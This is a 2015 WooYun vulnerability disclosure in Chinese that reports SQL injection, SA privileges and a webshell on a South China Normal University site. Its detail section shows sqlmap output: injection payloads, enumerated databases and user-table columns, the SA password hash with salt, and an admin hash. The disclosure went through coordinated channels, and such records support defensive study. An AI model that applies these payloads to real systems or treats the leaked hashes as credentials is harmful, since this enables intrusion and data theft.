当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147720

漏洞标题:华南师范大学注入漏洞,SA权限(已getshell,涉及学校内网)

相关厂商:华南师范大学

漏洞作者: 路人甲

提交时间:2015-10-19 12:43

修复时间:2015-12-03 13:24

公开时间:2015-12-03 13:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

华南师范大学某处SQL注入漏洞,SA权限(已getshell,可以漫游内网)。。。。。。。。。。

详细说明:

高校安全#华南师范大学某处SQL注入漏洞+SA权限 直接可以拿shell ,SA权限可以提下服务器,漫游学校内网。。。。。。。。。。。。
链接:http://**.**.**.**/Default.aspx?sid=01
跑出管理员账号和密码 进入后台 getshell 。。。。。。。
SA密码也得到了 可以SA提权。。。。。。。。。。。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=01' AND 7081=7081 AND 'ZNwe'='ZNwe
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sid=-4059' UNION ALL SELECT CHAR(58) CHAR(97) CHAR(109) CHAR(107) C
HAR(58) CHAR(78) CHAR(115) CHAR(68) CHAR(83) CHAR(65) CHAR(82) CHAR(105) CHAR(66
) CHAR(109) CHAR(82) CHAR(58) CHAR(112) CHAR(109) CHAR(110) CHAR(58)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sid=01'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sid=01' WAITFOR DELAY '0:0:5'--
---
[10:12:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[10:12:48] [INFO] fetching database names
[10:12:49] [WARNING] reflective value(s) found and filtering out
[10:12:49] [INFO] the SQL query used returns 6 entries
[10:12:49] [INFO] retrieved: "jgdw_data"
[10:12:49] [INFO] retrieved: "master"
[10:12:49] [INFO] retrieved: "model"
[10:12:50] [INFO] retrieved: "msdb"
[10:12:50] [INFO] retrieved: "qzlx_data"
[10:12:50] [INFO] retrieved: "tempdb"
available databases [6]:
[*] jgdw_data
[*] master
[*] model
[*] msdb
[*] qzlx_data
[*] tempdb
[10:12:56] [INFO] retrieved: "sa"
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004086ceb69bbbc04b7704aea10e131641842471b1649110bf
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 9bbbc04b7704aea10e131641842471b1649110bf
current database:    'qzlx_data'
Database: qzlx_data
[14 tables]
+---------------+
| code_dw       |
| code_userkind |
| logs          |
| posts         |
| posts_pics    |
| posts_sorts   |
| sys_sorts     |
| upfiles       |
| users         |
| users_sorts   |
| votesetting   |
| zxcs_csgl     |
| zxcs_list     |
| zxcs_tk       |
+---------------+
Database: qzlx_data
Table: users
[26 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| active      | bit      |
| answer      | varchar  |
| csny        | varchar  |
| czhm        | varchar  |
| dwbh        | varchar  |
| email       | varchar  |
| gzgw        | varchar  |
| id          | int      |
| isdwwy      | bit      |
| lastlogtime | datetime |
| lxdh        | varchar  |
| password    | varchar  |
| question    | varchar  |
| roles       | varchar  |
| txdz        | varchar  |
| userkind    | varchar  |
| username    | varchar  |
| xb          | varchar  |
| xm          | varchar  |
| xzzw        | varchar  |
| yzbm        | varchar  |
| zbbh        | varchar  |
| zyzc        | varchar  |
| zzmm        | varchar  |
| zzxl        | varchar  |
| zzxw        | varchar  |
+-------------+----------+
admin     83a70c2f3411f84f958e10171566c0eb


1.png


2.png


3.png


4.png


漏洞证明:

3.png


4.png


5.png


6.png


7.jpg


涉及学校内网 点到为止。。。。。。。

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-10-19 13:22

厂商回复:

通知处理中

最新状态:

暂无

漏洞评价:

评价